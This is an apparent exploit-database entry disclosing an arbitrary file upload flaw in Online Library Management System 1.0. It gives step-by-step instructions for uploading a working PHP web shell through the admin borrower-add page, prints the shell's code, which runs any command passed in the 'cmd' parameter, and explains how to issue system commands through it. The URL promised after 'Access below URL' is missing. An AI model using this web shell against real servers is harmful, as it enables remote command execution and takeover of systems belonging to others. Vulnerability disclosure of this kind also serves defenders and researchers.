Online Library Management System 1.0 Shell Upload

Online Library Management System version 1.0 suffers from a remote shell upload vulnerability.

MD5 | 459c992933d1f7209cbdf12c6e9c33d4

# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload
# Date: 22-10-2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add

Fill details
Create php shell code with below script
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Click on Browse
Select php file
Click Save
Access below URL:
add system commands after cmd to execute it.

Related Posts